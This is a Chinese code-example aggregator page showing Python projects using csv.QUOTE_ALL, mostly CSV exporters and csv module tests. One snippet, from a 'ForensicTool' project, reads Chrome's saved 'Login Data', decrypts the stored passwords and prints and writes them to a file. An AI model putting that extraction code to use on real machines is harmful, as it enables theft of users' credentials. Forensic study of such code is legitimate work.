Python csv 模块,QUOTE_ALL 实例源码

我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用csv.QUOTE_ALL

项目:Smelly-London    作者:Smelly-London    | 项目源码 | 文件源码
def create_carto_file():
    """ Creates a .csv file to be uploaded into http://carto.com with the smells. """

    location_finder = LocationFinder()

    filename = "carto.csv"
    csv_file = open(filename, "w", newline="")
    print("Output file: {}".format(filename))

    map_writer = csv.writer(csv_file, delimiter=",", quoting=csv.QUOTE_ALL)

    map_writer.writerow(["longitude", "latitude", "date", "location_name", "number_of_smells"])

    missing_locations = []
    for borough_name, borough_information in smell_hits.res.items():
        for year, number_of_smells in borough_information.items():
            (latitude, longitude) = location_finder.lookup(borough_name)
            if latitude is not None and longitude is not None:
                date = "{}/01/01".format(year)
                map_writer.writerow([latitude, longitude, date, borough_name, number_of_smells])
            else:
                if borough_name not in missing_locations:
                    missing_locations.append(borough_name)

    print("Missing locations:", missing_locations)
项目:fileflow    作者:industrydive    | 项目源码 | 文件源码
def clean_and_write_dataframe_to_csv(data, filename):
    """
    Cleans a dataframe of np.NaNs and saves to file via pandas.to_csv

    :param data: data to write to CSV
    :type data: :class:`pandas.DataFrame`
    :param filename: Path to file to write CSV to. if None, string of data
        will be returned
    :type filename: str | None
    :return: If the filename is None, returns the string of data. Otherwise
        returns None.
    :rtype: str | None
    """
    # cleans np.NaN values
    data = data.where((pd.notnull(data)), None)
    # If filename=None, to_csv will return a string
    result = data.to_csv(path_or_buf=filename, encoding='utf-8', dtype=str, index=False, na_rep=None,
                         skipinitialspace=True, quoting=csv.QUOTE_ALL)
    logging.info("Dataframe of shape %s has been stored." % str(data.shape))

    return result
项目:ForensicTool    作者:LewisC22    | 项目源码 | 文件源码
def LDParser(self):

        conn = sqlite3.connect (os.getenv("APPDATA") + "\..\Local\Google\Chrome\User Data\Default\Login Data")
        cursor = conn.cursor()
        cursor.execute('SELECT action_url, username_value, password_value FROM logins')
        output_file_path = 'ChromeCode/ChromeLoginData'
        with open(output_file_path, 'wb') as output_file:
            csv_writer = csv.writer(output_file, quoting=csv.QUOTE_ALL)
            headers = []
            csv_writer.writerow(headers)
            for result in cursor.fetchall():
                password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
                if password:
                    print 'Site: ' + result[0]
                    print 'Username: ' + result[1]
                    print 'Password: ' + password
                Final_list = (('Site', result[0]) + ("\n" 'Username', result[1]) + ("\n" 'Password', password))
                csv_writer.writerow(Final_list)
项目:ForensicTool    作者:LewisC22    | 项目源码 | 文件源码
def HistParser(self):

        HistStatement = 'SELECT url FROM urls'

#Basic HistoryParser pulling only urls

        with sqlite3.connect('C:\Users\Lewis Collins\AppData\Local\Google\Chrome\User Data\Default\History') as conn:
            conn.text_factory = str
            c = conn.cursor()
            output_file_path = 'ChromeCode/Chrome_Hist.csv'
            with open(output_file_path, 'wb') as output_file:
                csv_writer = csv.writer(output_file, quoting=csv.QUOTE_ALL)
                headers = []
                csv_writer.writerow(headers)
                epoch = datetime(1601, 1, 1)
                for row in (c.execute(HistStatement)):
                    row = list(row)
                    csv_writer.writerow(row)
项目:zippy    作者:securesystemslab    | 项目源码 | 文件源码
def _test_arg_valid(self, ctor, arg):
        self.assertRaises(TypeError, ctor)
        # PyPy gets an AttributeError instead of a TypeError
        self.assertRaises((TypeError, AttributeError), ctor, None)
        self.assertRaises(TypeError, ctor, arg, bad_attr = 0)
        self.assertRaises(TypeError, ctor, arg, delimiter = 0)
        self.assertRaises(TypeError, ctor, arg, delimiter = 'XX')
        self.assertRaises(csv.Error, ctor, arg, 'foo')
        self.assertRaises(TypeError, ctor, arg, delimiter=None)
        self.assertRaises(TypeError, ctor, arg, delimiter=1)
        self.assertRaises(TypeError, ctor, arg, quotechar=1)
        self.assertRaises(TypeError, ctor, arg, lineterminator=None)
        self.assertRaises(TypeError, ctor, arg, lineterminator=1)
        self.assertRaises(TypeError, ctor, arg, quoting=None)
        self.assertRaises(TypeError, ctor, arg,
                          quoting=csv.QUOTE_ALL, quotechar='')
        self.assertRaises(TypeError, ctor, arg,
                          quoting=csv.QUOTE_ALL, quotechar=None)
项目:zippy    作者:securesystemslab    | 项目源码 | 文件源码
def _test_dialect_attrs(self, ctor, *args):
        # Now try with dialect-derived options
        class dialect:
            delimiter='-'
            doublequote=False
            escapechar='^'
            lineterminator='$'
            quotechar='#'
            quoting=csv.QUOTE_ALL
            skipinitialspace=True
            strict=False
        args = args + (dialect,)
        obj = ctor(*args)
        self.assertEqual(obj.dialect.delimiter, '-')
        self.assertEqual(obj.dialect.doublequote, False)
        self.assertEqual(obj.dialect.escapechar, '^')
        self.assertEqual(obj.dialect.lineterminator, "$")
        self.assertEqual(obj.dialect.quotechar, '#')
        self.assertEqual(obj.dialect.quoting, csv.QUOTE_ALL)
        self.assertEqual(obj.dialect.skipinitialspace, True)
        self.assertEqual(obj.dialect.strict, False)
项目:zippy    作者:securesystemslab    | 项目源码 | 文件源码
def test_quoting(self):
        class mydialect(csv.Dialect):
            delimiter = ";"
            escapechar = '\\'
            doublequote = False
            skipinitialspace = True
            lineterminator = '\r\n'
            quoting = csv.QUOTE_NONE
        d = mydialect()

        mydialect.quoting = None
        self.assertRaises(csv.Error, mydialect)

        mydialect.doublequote = True
        mydialect.quoting = csv.QUOTE_ALL
        mydialect.quotechar = '"'
        d = mydialect()

        mydialect.quotechar = "''"
        self.assertRaises(csv.Error, mydialect)

        mydialect.quotechar = 4
        self.assertRaises(csv.Error, mydialect)
项目:oil    作者:oilshell    | 项目源码 | 文件源码
def _test_arg_valid(self, ctor, arg):
        self.assertRaises(TypeError, ctor)
        self.assertRaises(TypeError, ctor, None)
        self.assertRaises(TypeError, ctor, arg, bad_attr = 0)
        self.assertRaises(TypeError, ctor, arg, delimiter = 0)
        self.assertRaises(TypeError, ctor, arg, delimiter = 'XX')
        self.assertRaises(csv.Error, ctor, arg, 'foo')
        self.assertRaises(TypeError, ctor, arg, delimiter=None)
        self.assertRaises(TypeError, ctor, arg, delimiter=1)
        self.assertRaises(TypeError, ctor, arg, quotechar=1)
        self.assertRaises(TypeError, ctor, arg, lineterminator=None)
        self.assertRaises(TypeError, ctor, arg, lineterminator=1)
        self.assertRaises(TypeError, ctor, arg, quoting=None)
        self.assertRaises(TypeError, ctor, arg,
                          quoting=csv.QUOTE_ALL, quotechar='')
        self.assertRaises(TypeError, ctor, arg,
                          quoting=csv.QUOTE_ALL, quotechar=None)
项目:oil    作者:oilshell    | 项目源码 | 文件源码
def _test_dialect_attrs(self, ctor, *args):
        # Now try with dialect-derived options
        class dialect:
            delimiter='-'
            doublequote=False
            escapechar='^'
            lineterminator='$'
            quotechar='#'
            quoting=csv.QUOTE_ALL
            skipinitialspace=True
            strict=False
        args = args + (dialect,)
        obj = ctor(*args)
        self.assertEqual(obj.dialect.delimiter, '-')
        self.assertEqual(obj.dialect.doublequote, False)
        self.assertEqual(obj.dialect.escapechar, '^')
        self.assertEqual(obj.dialect.lineterminator, "$")
        self.assertEqual(obj.dialect.quotechar, '#')
        self.assertEqual(obj.dialect.quoting, csv.QUOTE_ALL)
        self.assertEqual(obj.dialect.skipinitialspace, True)
        self.assertEqual(obj.dialect.strict, False)
项目:python2-tracer    作者:extremecoders-re    | 项目源码 | 文件源码
def _test_arg_valid(self, ctor, arg):
        self.assertRaises(TypeError, ctor)
        self.assertRaises(TypeError, ctor, None)
        self.assertRaises(TypeError, ctor, arg, bad_attr = 0)
        self.assertRaises(TypeError, ctor, arg, delimiter = 0)
        self.assertRaises(TypeError, ctor, arg, delimiter = 'XX')
        self.assertRaises(csv.Error, ctor, arg, 'foo')
        self.assertRaises(TypeError, ctor, arg, delimiter=None)
        self.assertRaises(TypeError, ctor, arg, delimiter=1)
        self.assertRaises(TypeError, ctor, arg, quotechar=1)
        self.assertRaises(TypeError, ctor, arg, lineterminator=None)
        self.assertRaises(TypeError, ctor, arg, lineterminator=1)
        self.assertRaises(TypeError, ctor, arg, quoting=None)
        self.assertRaises(TypeError, ctor, arg,
                          quoting=csv.QUOTE_ALL, quotechar='')
        self.assertRaises(TypeError, ctor, arg,
                          quoting=csv.QUOTE_ALL, quotechar=None)
项目:python2-tracer    作者:extremecoders-re    | 项目源码 | 文件源码
def _test_dialect_attrs(self, ctor, *args):
        # Now try with dialect-derived options
        class dialect:
            delimiter='-'
            doublequote=False
            escapechar='^'
            lineterminator='$'
            quotechar='#'
            quoting=csv.QUOTE_ALL
            skipinitialspace=True
            strict=False
        args = args + (dialect,)
        obj = ctor(*args)
        self.assertEqual(obj.dialect.delimiter, '-')
        self.assertEqual(obj.dialect.doublequote, False)
        self.assertEqual(obj.dialect.escapechar, '^')
        self.assertEqual(obj.dialect.lineterminator, "$")
        self.assertEqual(obj.dialect.quotechar, '#')
        self.assertEqual(obj.dialect.quoting, csv.QUOTE_ALL)
        self.assertEqual(obj.dialect.skipinitialspace, True)
        self.assertEqual(obj.dialect.strict, False)
项目:costi    作者:lawlrenz    | 项目源码 | 文件源码
def rm_source(identnr):
    """removes source with input identnr
    :param identnr:
    """
    source = get_sources(ident=str(identnr))
    if source:
        source_name = source[0][1]
    else:
        return False

    path = CACHE_DIR + str(identnr) + "_" + source_name.replace(".", "") + '.json'

    all_sources = _get_all_sources_as_list()
    new = [x for x in all_sources if x[0] != identnr]

    with open(SOURCE_FLE_NAME, 'w+') as csvfile:
        sourcewriter = csv.writer(csvfile, delimiter=DELIMITER, quoting=csv.QUOTE_ALL)
        for row in new:
            sourcewriter.writerow(row)

    if os.remove(path):
        return True
    else:
        return False
项目:simpleredcapbuilder    作者:agapow    | 项目源码 | 文件源码
def expand (self, db_schema, inc_tags=False, exc_tags=False,
            out_pth=_TEMPLATE_PTH):
        self.db_schema = db_schema
        self.inc_tags, self.exc_tags = inc_tags, exc_tags
        assert not (inc_tags and exc_tags), "cannot have included and excluded tags"
        with open (out_pth, 'w') as out_hndl:
            self.out_hndl = out_hndl
            self.csv_writer = csv.DictWriter (out_hndl,
                fieldnames=[x.value for x in consts.OUTPUT_COLS],
                extrasaction='ignore',
                quoting=csv.QUOTE_ALL,
            )
            self.csv_writer.writeheader()

            for f in self.db_schema:
                self.expand_form (f)
项目:web_ctp    作者:molebot    | 项目源码 | 文件源码
def _test_arg_valid(self, ctor, arg):
        self.assertRaises(TypeError, ctor)
        self.assertRaises(TypeError, ctor, None)
        self.assertRaises(TypeError, ctor, arg, bad_attr = 0)
        self.assertRaises(TypeError, ctor, arg, delimiter = 0)
        self.assertRaises(TypeError, ctor, arg, delimiter = 'XX')
        self.assertRaises(csv.Error, ctor, arg, 'foo')
        self.assertRaises(TypeError, ctor, arg, delimiter=None)
        self.assertRaises(TypeError, ctor, arg, delimiter=1)
        self.assertRaises(TypeError, ctor, arg, quotechar=1)
        self.assertRaises(TypeError, ctor, arg, lineterminator=None)
        self.assertRaises(TypeError, ctor, arg, lineterminator=1)
        self.assertRaises(TypeError, ctor, arg, quoting=None)
        self.assertRaises(TypeError, ctor, arg,
                          quoting=csv.QUOTE_ALL, quotechar='')
        self.assertRaises(TypeError, ctor, arg,
                          quoting=csv.QUOTE_ALL, quotechar=None)
项目:web_ctp    作者:molebot    | 项目源码 | 文件源码
def _test_dialect_attrs(self, ctor, *args):
        # Now try with dialect-derived options
        class dialect:
            delimiter='-'
            doublequote=False
            escapechar='^'
            lineterminator='$'
            quotechar='#'
            quoting=csv.QUOTE_ALL
            skipinitialspace=True
            strict=False
        args = args + (dialect,)
        obj = ctor(*args)
        self.assertEqual(obj.dialect.delimiter, '-')
        self.assertEqual(obj.dialect.doublequote, False)
        self.assertEqual(obj.dialect.escapechar, '^')
        self.assertEqual(obj.dialect.lineterminator, "$")
        self.assertEqual(obj.dialect.quotechar, '#')
        self.assertEqual(obj.dialect.quoting, csv.QUOTE_ALL)
        self.assertEqual(obj.dialect.skipinitialspace, True)
        self.assertEqual(obj.dialect.strict, False)
项目:WebHashcat    作者:hegusung    | 项目源码 | 文件源码
def csv_masks(request, hashfile_id):
    hashfile = get_object_or_404(Hashfile, id=hashfile_id)

    # didn't found the correct way in pure django...
    res = Cracked.objects.raw("SELECT id, password_mask, COUNT(*) AS count FROM Hashcat_cracked USE INDEX (hashfileid_id_index) WHERE hashfile_id=%s GROUP BY password_mask ORDER BY count DESC", [hashfile.id])

    fp = tempfile.SpooledTemporaryFile(mode='w')
    csvfile = csv.writer(fp, quotechar='"', quoting=csv.QUOTE_ALL)
    for item in res:
        csvfile.writerow([item.count, item.password_mask])
    fp.seek(0)   # rewind the file handle

    csvfile_data = fp.read()

    for query in connection.queries[-1:]:
        print(query["sql"])
        print(query["time"])

    response = HttpResponse(csvfile_data, content_type='application/force-download') # mimetype is replaced by content_type for django 1.7
    response['Content-Disposition'] = 'attachment; filename=%s_masks.csv' % hashfile.name
    return response
项目:sirene    作者:etalab    | 项目源码 | 文件源码
def write_stock(stock_out, filtered_stock, modifications):
    """
    Generate the new stock file with modified and created entries.

    We mimick the initial stock with encoding, quotes and delimiters.
    """
    with open(stock_out, 'w', encoding='cp1252') as csv_file:
        _, first_row, fieldnames = next(filtered_stock)
        # `extrasaction` is set to `ignore` to be able to pass more keys
        # to the `writerow` method coming from the flux.
        writer = csv.DictWriter(
            csv_file, fieldnames=fieldnames, delimiter=';',
            quoting=csv.QUOTE_ALL, extrasaction='ignore')
        writer.writeheader()
        # Because we already iterate once to retrieve fieldnames.
        writer.writerow(first_row)
        # Then write the updated stock.
        for i, row, _ in filtered_stock:
            writer.writerow(row)
        # Finally, append creations and insertions.
        for siret, row in modifications.items():
            is_created = row['VMAJ'] == 'C'
            is_inserted = row['VMAJ'] == 'D'
            if is_created or is_inserted:
                writer.writerow(row)
项目:sirene    作者:etalab    | 项目源码 | 文件源码
def write_stock(stock_out, filtered_stock):
    """
    Generate the new stock file with filtered entries.

    We mimick the initial stock with encoding, quotes and delimiters.
    """
    with open(stock_out, 'w', encoding='cp1252') as csv_file:
        _, first_row, fieldnames = next(filtered_stock)
        # `extrasaction` is set to `ignore` to be able to pass more keys
        # to the `writerow` method coming from the flux.
        writer = csv.DictWriter(
            csv_file, fieldnames=fieldnames, delimiter=';',
            quoting=csv.QUOTE_ALL, extrasaction='ignore')
        writer.writeheader()
        # Because we already iterate once to retrieve fieldnames.
        writer.writerow(first_row)
        # Then write the updated stock.
        for i, row, _ in filtered_stock:
            writer.writerow(row)
项目:pefile.pypy    作者:cloudtracer    | 项目源码 | 文件源码
def _test_arg_valid(self, ctor, arg):
        self.assertRaises(TypeError, ctor)
        # PyPy gets an AttributeError instead of a TypeError
        self.assertRaises((TypeError, AttributeError), ctor, None)
        self.assertRaises(TypeError, ctor, arg, bad_attr = 0)
        self.assertRaises(TypeError, ctor, arg, delimiter = 0)
        self.assertRaises(TypeError, ctor, arg, delimiter = 'XX')
        self.assertRaises(csv.Error, ctor, arg, 'foo')
        self.assertRaises(TypeError, ctor, arg, delimiter=None)
        self.assertRaises(TypeError, ctor, arg, delimiter=1)
        self.assertRaises(TypeError, ctor, arg, quotechar=1)
        self.assertRaises(TypeError, ctor, arg, lineterminator=None)
        self.assertRaises(TypeError, ctor, arg, lineterminator=1)
        self.assertRaises(TypeError, ctor, arg, quoting=None)
        self.assertRaises(TypeError, ctor, arg,
                          quoting=csv.QUOTE_ALL, quotechar='')
        self.assertRaises(TypeError, ctor, arg,
                          quoting=csv.QUOTE_ALL, quotechar=None)
项目:pefile.pypy    作者:cloudtracer    | 项目源码 | 文件源码
def _test_dialect_attrs(self, ctor, *args):
        # Now try with dialect-derived options
        class dialect:
            delimiter='-'
            doublequote=False
            escapechar='^'
            lineterminator='$'
            quotechar='#'
            quoting=csv.QUOTE_ALL
            skipinitialspace=True
            strict=False
        args = args + (dialect,)
        obj = ctor(*args)
        self.assertEqual(obj.dialect.delimiter, '-')
        self.assertEqual(obj.dialect.doublequote, False)
        self.assertEqual(obj.dialect.escapechar, '^')
        self.assertEqual(obj.dialect.lineterminator, "$")
        self.assertEqual(obj.dialect.quotechar, '#')
        self.assertEqual(obj.dialect.quoting, csv.QUOTE_ALL)
        self.assertEqual(obj.dialect.skipinitialspace, True)
        self.assertEqual(obj.dialect.strict, False)
项目:sql-validator    作者:anthonygarvan    | 项目源码 | 文件源码
def run_rules(job_id, schema_name):
    meta_conn = psycopg2.connect("dbname='validator' user='testUser' host='localhost' password='testPwd'")
    meta_conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
    meta_c = meta_conn.cursor()
    meta_c.execute('UPDATE jobs SET status=\'starting_rules\' WHERE job_id=%d' % job_id)
    conn = psycopg2.connect("dbname='job_%d' user='testUser' host='localhost' password='testPwd'" % job_id)
    c = conn.cursor()

    reader = csv.reader(open('rules/%s.csv' % schema_name, 'rb'), quotechar='"', delimiter=',',
                     quoting=csv.QUOTE_ALL, skipinitialspace=True)
    header = reader.next()

    for row in reader:
        sql = row[header.index('sql')]
        print "Running rule %s: %s" % (row[header.index('id')], sql)
        c.execute(sql)
        invalid_count = 0
        for row in c.fetchall():
            invalid_count += 1
        print '==> Found %d invalid rows.' % invalid_count
    conn.close()
    meta_c.execute("UPDATE jobs SET status='finished_rules' WHERE job_id=%d" % job_id)
    meta_conn.close()
项目:ouroboros    作者:pybee    | 项目源码 | 文件源码
def _test_arg_valid(self, ctor, arg):
        self.assertRaises(TypeError, ctor)
        self.assertRaises(TypeError, ctor, None)
        self.assertRaises(TypeError, ctor, arg, bad_attr = 0)
        self.assertRaises(TypeError, ctor, arg, delimiter = 0)
        self.assertRaises(TypeError, ctor, arg, delimiter = 'XX')
        self.assertRaises(csv.Error, ctor, arg, 'foo')
        self.assertRaises(TypeError, ctor, arg, delimiter=None)
        self.assertRaises(TypeError, ctor, arg, delimiter=1)
        self.assertRaises(TypeError, ctor, arg, quotechar=1)
        self.assertRaises(TypeError, ctor, arg, lineterminator=None)
        self.assertRaises(TypeError, ctor, arg, lineterminator=1)
        self.assertRaises(TypeError, ctor, arg, quoting=None)
        self.assertRaises(TypeError, ctor, arg,
                          quoting=csv.QUOTE_ALL, quotechar='')
        self.assertRaises(TypeError, ctor, arg,
                          quoting=csv.QUOTE_ALL, quotechar=None)
项目:ouroboros    作者:pybee    | 项目源码 | 文件源码
def _test_dialect_attrs(self, ctor, *args):
        # Now try with dialect-derived options
        class dialect:
            delimiter='-'
            doublequote=False
            escapechar='^'
            lineterminator='$'
            quotechar='#'
            quoting=csv.QUOTE_ALL
            skipinitialspace=True
            strict=False
        args = args + (dialect,)
        obj = ctor(*args)
        self.assertEqual(obj.dialect.delimiter, '-')
        self.assertEqual(obj.dialect.doublequote, False)
        self.assertEqual(obj.dialect.escapechar, '^')
        self.assertEqual(obj.dialect.lineterminator, "$")
        self.assertEqual(obj.dialect.quotechar, '#')
        self.assertEqual(obj.dialect.quoting, csv.QUOTE_ALL)
        self.assertEqual(obj.dialect.skipinitialspace, True)
        self.assertEqual(obj.dialect.strict, False)
项目:ndk-python    作者:gittor    | 项目源码 | 文件源码
def _test_arg_valid(self, ctor, arg):
        self.assertRaises(TypeError, ctor)
        self.assertRaises(TypeError, ctor, None)
        self.assertRaises(TypeError, ctor, arg, bad_attr = 0)
        self.assertRaises(TypeError, ctor, arg, delimiter = 0)
        self.assertRaises(TypeError, ctor, arg, delimiter = 'XX')
        self.assertRaises(csv.Error, ctor, arg, 'foo')
        self.assertRaises(TypeError, ctor, arg, delimiter=None)
        self.assertRaises(TypeError, ctor, arg, delimiter=1)
        self.assertRaises(TypeError, ctor, arg, quotechar=1)
        self.assertRaises(TypeError, ctor, arg, lineterminator=None)
        self.assertRaises(TypeError, ctor, arg, lineterminator=1)
        self.assertRaises(TypeError, ctor, arg, quoting=None)
        self.assertRaises(TypeError, ctor, arg,
                          quoting=csv.QUOTE_ALL, quotechar='')
        self.assertRaises(TypeError, ctor, arg,
                          quoting=csv.QUOTE_ALL, quotechar=None)
项目:ndk-python    作者:gittor    | 项目源码 | 文件源码
def _test_dialect_attrs(self, ctor, *args):
        # Now try with dialect-derived options
        class dialect:
            delimiter='-'
            doublequote=False
            escapechar='^'
            lineterminator='$'
            quotechar='#'
            quoting=csv.QUOTE_ALL
            skipinitialspace=True
            strict=False
        args = args + (dialect,)
        obj = ctor(*args)
        self.assertEqual(obj.dialect.delimiter, '-')
        self.assertEqual(obj.dialect.doublequote, False)
        self.assertEqual(obj.dialect.escapechar, '^')
        self.assertEqual(obj.dialect.lineterminator, "$")
        self.assertEqual(obj.dialect.quotechar, '#')
        self.assertEqual(obj.dialect.quoting, csv.QUOTE_ALL)
        self.assertEqual(obj.dialect.skipinitialspace, True)
        self.assertEqual(obj.dialect.strict, False)
项目:NetDetect    作者:ericzhao28    | 项目源码 | 文件源码
def score_packets(input_url='data/raw_packets.csv', output_url='data/scored_packets.csv'):
  '''
  Adds score indicators to botnets
  '''
  print("Transforming initial data csv")
  with open(output_url, 'w') as raw_flows:
    writer = csv.writer(raw_flows, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
    with open(input_url) as csvfile:
      writer.writerow(headers + "Score")
      first = True
      for row in csv.reader(csvfile, delimiter=',', quotechar='"'):
        if first is True:
          first = False
          continue
        if row[headers.index('Label')] == "BENIGN":
          row.append(0)
        else:
          row.append(1)
        writer.writerow(row)
项目:NetDetect    作者:ericzhao28    | 项目源码 | 文件源码
def modify_csv_rows(input_url=PROJ_ROOT+'data/data.csv', output_url=PROJ_ROOT+'data/modified_data.csv'):
  print("Transforming initial data csv")
  with open(output_url, 'w') as new:
    newWriter = csv.writer(new, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
    with open(input_url) as csvfile:
      newWriter.writerow(['Source Port', 'Destination Port', 'Eth', 'Source', 'Destination', 'Protocol', 'IP_Flags', 'Length', 'Protocols in frame', 'Time', 'tcp_Flags', 'TCP Segment Len', 'udp_Length'])
      first = True
      for row in csv.reader(csvfile, delimiter=',', quotechar='"'):
        if first == True:
          first = False
          continue
        if row[2]:
          row.pop(0)
          row.pop(0)
        else:
          row.pop(2)
          row.pop(2)
        newWriter.writerow(row) 
      print("Csv row modification complete\n##############################")
项目:a4-meinberlin    作者:liqd    | 项目源码 | 文件源码
def test_csv_export(rf, module):
    class CSVExport(views.AbstractCSVExportView):
        def get_filename(self):
            return 'testexport.csv'

        def get_header(self):
            return ['head1', 'head2']

        def export_rows(self):
            return [['regular', 'delimiter,;\t '],
                    ['escaping"\'', 'newlines\r\n']]

    request = rf.get('/')
    response = CSVExport.as_view()(request, module=module)

    assert response['Content-Disposition'] == 'attachment; ' \
                                              'filename="testexport.csv"'

    reader = csv.reader(response.content.decode('utf-8').splitlines(True),
                        lineterminator='\n', quotechar='"',
                        quoting=csv.QUOTE_ALL)
    lines = list(reader)
    assert lines[0] == ['head1', 'head2']
    assert lines[1] == ['regular', 'delimiter,;\t ']
    assert lines[2] == ['escaping"\'', 'newlines\r\n']
项目:SHOGUN    作者:knights-lab    | 项目源码 | 文件源码
def main():
    parser = make_arg_parser()
    args = parser.parse_args()

    sam_files = [os.path.join(args.input, filename) for filename in os.listdir(args.input) if filename.endswith('.sam')]

    img_map = IMGMap()

    ncbi_tree = NCBITree()

    with open(args.output, 'w') if args.output else sys.stdout as outf:
        csv_outf = csv.writer(outf, quoting=csv.QUOTE_ALL, lineterminator='\n')
        csv_outf.writerow(['sample_id', 'sequence_id', 'ncbi_tid', 'img_id'])
        for file in sam_files:
            with open(file) as inf:
                lca_map = build_lca_map(yield_alignments_from_sam_inf(inf), ncbi_tree, img_map)
                for key in lca_map:
                    img_ids, ncbi_tid = lca_map[key]
                    csv_outf.writerow([os.path.basename(file)[:-4],  key, ncbi_tid, ','.join(img_ids)])
项目:naziscore    作者:rbanffy    | 项目源码 | 文件源码
def get(self):
        cached = memcache.get('best_handler')
        if cached:
            self.response.out.write(cached)
        else:
            response_writer = csv.writer(
                self.response, delimiter=',', quoting=csv.QUOTE_ALL)

            # Instruct endpoint to cache for 1 day.
            self.response.headers['Cache-control'] = 'public, max-age=86400'

            for line in ndb.gql(
                    'select distinct screen_name, twitter_id, score '
                    'from Score order by score limit 20000'):
                response_writer.writerow(
                    [line.screen_name, line.twitter_id, line.score])
            memcache.set('best_handler', self.response.text, 86400)
项目:naziscore    作者:rbanffy    | 项目源码 | 文件源码
def get(self):
        cached = memcache.get('worst_handler')
        if cached:
            self.response.out.write(cached)
        else:
            response_writer = csv.writer(
                self.response, delimiter=',', quoting=csv.QUOTE_ALL)

            # Instruct endpoint to cache for 1 day.
            self.response.headers['Cache-control'] = 'public, max-age=86400'

            # Using GQL as a test - will create new index
            for line in ndb.gql(
                    'select distinct screen_name, twitter_id, score '
                    'from Score order by score desc limit 20000'):
                response_writer.writerow(
                    [line.screen_name, line.twitter_id, line.score])
            memcache.set('worst_handler', self.response.text, 86400)
项目:naziscore    作者:rbanffy    | 项目源码 | 文件源码
def get(self):
        cached = memcache.get('worst_hashtags')
        if cached:
            self.response.out.write(cached)
        else:
            response_writer = csv.writer(
                self.response, delimiter=',', quoting=csv.QUOTE_ALL)

            # Instruct endpoint to cache for 1 day.
            self.response.headers['Cache-control'] = 'public, max-age=86400'

            c = Counter()
            for s in Score.query().order(-Score.score).iter(
                        limit=5000, projection=(Score.hashtags)):
                if s.hashtags is not None:
                    c.update((h.lower() for h in s.hashtags))
            for tag, tag_count in c.most_common(100):
                response_writer.writerow(
                    [tag, tag_count])
            memcache.set('worst_hashtags', self.response.text, 86400)
项目:naziscore    作者:rbanffy    | 项目源码 | 文件源码
def get(self):
        cached = memcache.get('worst_websitess')
        if cached:
            self.response.out.write(cached)
        else:
            response_writer = csv.writer(
                self.response, delimiter=',', quoting=csv.QUOTE_ALL)

            # Instruct endpoint to cache for 1 day.
            self.response.headers['Cache-control'] = 'public, max-age=86400'

            c = Counter()
            for s in Score.query().order(-Score.score).iter(
                        limit=5000, projection=(Score.websites)):
                if s.websites is not None:
                    c.update((h.lower() for h in s.websites))
            for site, site_count in c.most_common(200):
                response_writer.writerow(
                    [site, site_count])
            memcache.set('worst_websitess', self.response.text, 86400)
项目:naziscore    作者:rbanffy    | 项目源码 | 文件源码
def get(self):
        cached = memcache.get('worst_unknown_websites')
        if cached:
            self.response.out.write(cached)
        else:
            response_writer = csv.writer(
                self.response, delimiter=',', quoting=csv.QUOTE_ALL)

            # Instruct endpoint to cache for 1 day.
            self.response.headers['Cache-control'] = 'public, max-age=86400'

            c = Counter()
            for s in Score.query().order(-Score.score).iter(
                        limit=5000, projection=(Score.websites)):
                if s.websites is not None:
                    c.update((h.lower() for h in s.websites
                              if h.lower() not in c('KNOWN_SITES')))
            for site, site_count in c.most_common(200):
                response_writer.writerow(
                    [site, site_count])
            memcache.set('worst_unknown_websites', self.response.text, 86400)
项目:kbe_server    作者:xiaohaoppy    | 项目源码 | 文件源码
def _test_arg_valid(self, ctor, arg):
        self.assertRaises(TypeError, ctor)
        self.assertRaises(TypeError, ctor, None)
        self.assertRaises(TypeError, ctor, arg, bad_attr = 0)
        self.assertRaises(TypeError, ctor, arg, delimiter = 0)
        self.assertRaises(TypeError, ctor, arg, delimiter = 'XX')
        self.assertRaises(csv.Error, ctor, arg, 'foo')
        self.assertRaises(TypeError, ctor, arg, delimiter=None)
        self.assertRaises(TypeError, ctor, arg, delimiter=1)
        self.assertRaises(TypeError, ctor, arg, quotechar=1)
        self.assertRaises(TypeError, ctor, arg, lineterminator=None)
        self.assertRaises(TypeError, ctor, arg, lineterminator=1)
        self.assertRaises(TypeError, ctor, arg, quoting=None)
        self.assertRaises(TypeError, ctor, arg,
                          quoting=csv.QUOTE_ALL, quotechar='')
        self.assertRaises(TypeError, ctor, arg,
                          quoting=csv.QUOTE_ALL, quotechar=None)
项目:kbe_server    作者:xiaohaoppy    | 项目源码 | 文件源码
def _test_dialect_attrs(self, ctor, *args):
        # Now try with dialect-derived options
        class dialect:
            delimiter='-'
            doublequote=False
            escapechar='^'
            lineterminator='$'
            quotechar='#'
            quoting=csv.QUOTE_ALL
            skipinitialspace=True
            strict=False
        args = args + (dialect,)
        obj = ctor(*args)
        self.assertEqual(obj.dialect.delimiter, '-')
        self.assertEqual(obj.dialect.doublequote, False)
        self.assertEqual(obj.dialect.escapechar, '^')
        self.assertEqual(obj.dialect.lineterminator, "$")
        self.assertEqual(obj.dialect.quotechar, '#')
        self.assertEqual(obj.dialect.quoting, csv.QUOTE_ALL)
        self.assertEqual(obj.dialect.skipinitialspace, True)
        self.assertEqual(obj.dialect.strict, False)
项目:pubtransit    作者:pubtransit    | 项目源码 | 文件源码
def read_table(zip_file, table_name, columns, dtypes=None):
    if not dtypes:
        dtypes = {}

    with zip_file.open(table_name + '.txt', 'r') as csv_stream:
        hearer = csv_stream.readline().strip()

        names = [
            GET_COLUMN_NAME_REGEX.sub(b'', name).decode('ascii')
            for name in hearer.split(b',')]

        table = pandas.read_csv(
            csv_stream, names=names, quotechar='"', quoting=csv.QUOTE_ALL,
            usecols=[col for col in columns])
        table = [
            numpy.asarray(remove_nans(table[column]), dtype=dtypes.get(column))
            for column in columns]
        return table
项目:vangogh    作者:gfolego    | 项目源码 | 文件源码
def gen_csv(csvfile, page_list):

    # Define writer
    writer = csv.writer(csvfile, quoting=csv.QUOTE_ALL)

    # Field names
    field_names = ['PageID', 'DescriptionURL', 'ImageURL', 'ImageSHA1',
            'PixelHeight', 'PixelWidth',
            'PaintingID', 'Artist', 'RealDimensions']

    writer.writerow(field_names)

    # For each image
    for page in page_list:
        writer.writerow([page.page_id, page.description_url, page.img_url,
            page.img_sha1, page.img_height, page.img_width,
            page.paint_id, page.artist, page.dim])


# Main
项目:django-csv-export-view    作者:benkonrath    | 项目源码 | 文件源码
def get_csv_writer_fmtparams(self):
        return {
